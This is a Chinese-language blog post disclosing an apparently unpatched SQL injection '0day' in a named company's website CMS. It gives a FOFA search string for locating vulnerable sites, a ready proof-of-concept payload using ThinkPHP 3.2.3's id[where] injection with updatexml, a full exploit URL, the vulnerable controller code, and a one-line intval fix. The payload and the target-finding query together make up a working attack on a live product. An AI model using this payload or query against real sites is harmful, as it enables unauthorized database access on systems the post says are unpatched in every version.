【在野0day】某建站系统存在SQL注入漏洞

漏洞描述

北京金方时代科技有限公司建站系统存在SQL注入漏洞

影响版本

全版本

fofa语法

“金方时代内容管理系统”

漏洞复现

官网:https://www.bjjfsd.com/

Poc:


id[where]=1%20or%20updatexml(0,user(),0)

源代码分析:漏洞在

Application/Wap/Controller/IndexController.class.php中:

public function data_show($id = 0) {

    if (empty($id)) {

        $this->redirect('index');

    }

 $info = M('News')->find($id);

可以看到$id参数没有过滤直接代入find函数,框架为thinkphp3.2.3,所以使用[where]进行注入。

http://localhost/index.php?m=Wap&c=Index&a=data_show&id[where]=1%20or%20updatexml(0,user(),0)

Fofa:”金方时代内容管理系统”

案例:

【在野0day】某建站系统存在SQL注入漏洞
临时解决方案$id=intval($id);
© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容